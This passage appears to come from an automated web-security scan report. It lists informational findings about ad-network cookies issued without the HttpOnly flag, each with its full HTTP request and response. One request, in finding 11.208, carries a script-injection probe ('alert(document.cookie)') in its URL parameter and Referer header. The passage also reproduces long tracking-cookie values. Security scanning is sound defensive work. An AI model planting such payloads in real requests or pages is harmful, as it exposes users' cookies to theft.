Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:48 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.205. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:23 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.206. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:24 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.207. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=246673&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1361549;type=landi756;cat=zipco403;ord=1;num=3596418555825.9487?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=arn7TwNZaiMt6memCmGwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bWalbfCPvRr5pHFJ2IiiqvUj8gL5UKMojsRtkyGv3iLgZdLhJWNtFwIaQqSDUhJXcolRQQftgBRpZbqFL3j1LmZaRLgOPqeE7bMdTEIGxtZdfM5WI7wWtsmYZaJOJkAibgqRMFJEdwIqaWU9WeZd8ntA03ww6cnyXOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNZb3ZbqSUdhKTLyZaa4ZcFGHeZbVThMfN8pnAYOeBZbsKVSfraRuvG30PErMalZa5

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=acn9yYr2PKMbuYn3Ycn4F5XpyFRGnTGDP2XlKn4flsYZaThCaY83G72Ttfc5CJViEZdoE1yd1Usq1ZbkfXpBHsFbApGkQGaGqZahSVsP8xUffgA1ZcJVp3fGOk7aFW4RXZdTdir1WbQPysXanCH1StdPbR7GqZauWGq8Y6I9JPro4uHhxESlZbSqZbJPt8EUtHZdhVXqPEBFUuZd4qdrX2qCIkoIyfEZaVUjyXqKZb6MKiReZdmBw1Zc3rThnZaB2yPbObsqku3t2yYFpeArR41kxK4jvH0GX38pfMAcc7tQmrno85a83b4DEKPAUQtQMl5tshRx5ZbGTn6TnNL6Eci6b9WavR62BX5N2WpqNp6pVCEj66XWGv45XZcl03UDwgInTwrFUORinp35JMdrGb; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:27:34 GMT;
Content-Type: text/html
Location: http://ad.yieldmanager.com/pixel?id=473373&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3612
Content-Length: 0
Connection: keep-alive


11.208. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 14:14:39 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 660

document.write('<IFRAME src="http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36
...[SNIP]...

11.209. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 1767
Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;">
<IFRAME SRC="http://ad.doubleclick.net/adi/N3671.CentroNetw
...[SNIP]...

11.210. http://ad.doubleclick.net/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3a9d/17/19e/*/x;234178444;1-0;0;58087481;3454-728/90;40401349/40419136/1;;~sscs=?http:/a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true
Set-Cookie: id=c653243310000d9|2782903/1009150/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 28 Jan 2011 16:41:38 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


11.211. http://ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=300x250;pc=[TPAS_ID];ord=1114886567?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.vw.com
Set-Cookie: id=c653243310000d9|1033942/1042959/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 28 Jan 2011 16:40:24 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


11.212. http://ad.doubleclick.net/jump/N6103.135388.BIZO/B5185769.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N6103.135388.BIZO/B5185769.6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N6103.135388.BIZO/B5185769.6;sz=728x90;ord=7630304?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.supercutsfranchise.com
Set-Cookie: id=c653243310000d9|3050873/1051395/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 28 Jan 2011 16:40:37 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


11.213. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25206694&ahcid=78205&bimpd=21muvIbp10pUTWpgKeYXuBQpi4lGWgXGmwtEktp0bnhlzcEPCmKdzaOiN1w1JuG39EwjnwLbuWY9jCkZnpaQCWMdTXpPOHIA4Z3jWxQxlq4y0vr517NqPsPUS5E3qaEy91D0_KKhuTQf67OuV_F749IlnflTkyMzHOFj90yiivHk_Cifb2ytW8v8q_Ju-6U92ggx_bSQJBFgf_df8ZyZOeIlwU6iDh8JI6jOqp9q_Wu3L84a7I2NobirdMafsG3a4N_1k_LcbI1l_qw0hEgsW7ih2yQWaHy9ifTWvGQp8MHeKeZbcKBEFJ-wvfKan3_Boe6iWHbggg0Ypr7Atghsve1apqwxaDzB0mbr6PDH01f6uHcLMkCy-9027k5Tm6h9eWjcOJtBxwrIpab7eQoB2_vtezeQUtzKlS-ZQl0TjFHJLs4Ovk7WWqSFZMBZz0bEQl2pohKvINvcsARm5gxTHdmyu_XeZQTM0Y5XRGWekIB53lXvcwhi6qGeInxFIoFRfkbJ9D6YlCf5v80FPzVo5ZXIC94vkRX48casGySCH6SZxmuGhwjIl1JUdlPvihaCvfBz5xDsVEqchMpjM7fNhfDYOPZ0JXZ2uZFvjyYJf-F96K7oroatdbmzLY4GaezlgHULOjMY_qhRxKBMycAthKXuC9_2QhUUPMZBRYynaNwC3_JOWKiVz48eoEJe8dgOqRCcEuBcKxtaNJfsYHiQ1JAURjFg_cZiTZL5pFw8O7mjsZQyAQ6kVAwWSib4A4xDzHGAvnK92wWrpVqHjkZPWuoljc-5zAAoOxoBcBgje0LDTAGcK0LbrjjUGkdS7-oV&acp=35600B7D7485C869&rtbacid=55ed4e5e03bf8e5477cfcd0039923902d2e38a03 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sun, 30 Jan 2011 17:37:29 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=93BCq0WTCVMxF4AWDa_UBzGK2WVGmSebj4padkL3fXlh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKX8qYrC9FMnU5Q2wRAYDGypi9OYrtG-b0iAWL5Sg__z6OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIk